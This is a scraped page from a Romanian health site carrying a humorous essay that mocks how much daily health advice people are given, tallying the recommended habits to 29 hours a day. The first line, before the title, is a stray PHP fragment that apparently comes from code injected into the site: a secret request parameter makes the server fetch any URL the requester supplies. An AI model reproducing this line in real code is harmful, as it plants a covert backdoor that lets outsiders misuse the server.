isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); Pentru adultii "contemporani" - MedicAS

“Se spune că zilnic trebuie să mănânci un măr pentru fier şi o banană pentru potasiu.De asemenea o portocală pentru vitamina C, o jumatate de pepene galben pentru a îmbunătăţi digestia şi o cană de ceai verde, fără zahăr, pentru a preveni diabetul. În fiecare zi trebuie să bei doi litri de apă şi apoi să aştepţi timp dublu decât timpul pe care ţi l-a luat ca să-i bei.

Zilnic trebuie să mănânci iaurt Activia, cu “L. Cassei Defensis”, care nu ştie nimeni ce este, dar se pare că, dacă nu bei un iaurt şi jumătate în fiecare zi, începi să vezi lumea cam tulbure. În fiecare zi o aspirină, pentru a preveni infarctul, şi un pahar de vin roşu, pentru acelaşi motiv. Şi altul de vin alb, pentru sistemul nervos. Şi unul de bere, pe care deja nu-mi mai amintesc pentru ce era. Dacă le bei pe toate împreună, chiar şi dacă faci o indigestie, nu te mai preocupă şi probabil nici nu te mai interesează altceva.

În fiecare zi trebuie să mănânci fibre. Multe, foarte multe fibre. Trebuie să mănânci între 4-6 feluri zilnic, uşoare, fără să uiţi să mesteci de 100 de ori fiecare înghiţitură. Făcând un mic calcul, doar pentru a mânca, iţi ia cam 5 ore. Ah, după fiecare mâncare trebuie să te speli pe dinţi, adică: după Activia şi fibre, dinţii, după banană, dinţii, după măr, dinţii…şi tot aşa, daca ai dinţi, fără să uiţi să foloseşti firul dentar, masajul gingiilor, o sorbitură de Plax.

Mai bine umple cada şi pune muzică, pentru ca între apă, fire şi dinţi, îţi vei petrece câteva ore aici, înăuntru. Dacă dormi 8 ore şi lucrezi alte 8, plus cele 5 pe care le folosim pentru mâncare, fac 21 de ore . Îţi raman 3, în care întotdeauna se poate întâmpla ceva imprevizibil. După statistici, ne uităm 3 ore zilnic la televizor.

Ei bine, deja nu se poate, pentru că în fiecare zi trebuie să mergi cel puţin o jumătate de oră pe jos, adică să te întorci după 15 minute, că altfel după o jumătate de oră se face o oră de mers. Şi trebuie să-ţi păstrezi prieteniile, pentru că sunt ca plantele: trebuie udate zilnic. Şi când pleci în vacanţă de asemenea. Pe lângă asta trebuie să fii bine informat, aşa că trebuie să citeşti cel puţin două ziare şi anumite articole de revistă, pentru a compara informaţia.

Ah, trebuie să faci sex zilnic, dar fără să ajungi să fie o rutină: trebuie să fii inventator, creator, să “renovezi” seducţia. Asta ia timp; si nici nu mai vorbim dacă este sex tantric !!!(cu respect îţi reamintesc: după fiecare mâncare , trebuie să-ţi perii dinţii).

De asemenea trebuie să-ţi faci timp pentru curăţenie, pentru spălat rufe, vase, şi nu mai zic dacă ai câine, sau alt animal… copiii? În fine, după socoteala mea, îmi ies cam 29 de ore zilnic. Singura posibilitate care-mi trece prin minte este să faci mai multe lucruri deodata, de exemplu: îţi faci duş cu apă rece şi cu gura deschisă, aşa bei cei 2 litri de apă.

În timp ce ieşi din baie cu periuţa de dinţi în gură, te duci să faci amor (tantric) în picioare, cu perechea ta, care în treacat se uită la TV şi comentează, în timp ce tu mături. Ti-a rămas o mână liberă? Cheamă-ţi prietenii şi părinţii !!! Bea vinul (după ce îţi chemi părinţii va fi nevoie ).

Iaurtul cu măr ţi-l poate da perechea ta, în timp ce îşi mănâncă banana cu Activia şi mâine schimbaţi. Ce bine e că deja am crescut şi nu mai trebuie să luăm obligatoriul Danonino Extra Calciu în fiecare zi. Şi acum te las pentru că între iaurt, jumătatea de pepene, berea, primul litru de apă şi a treia mâncare cu fibre din zi, deja nu stiu ce să mai fac, dar am nevoie la toaletă urgent …

Ah, o să profit şi îmi voi lua periuţa de dinţi…”


Cuvinte relevante:


Articole asemănătoare:


Adaugă un comentariu






 
 

Newsletter

Loading... Loading...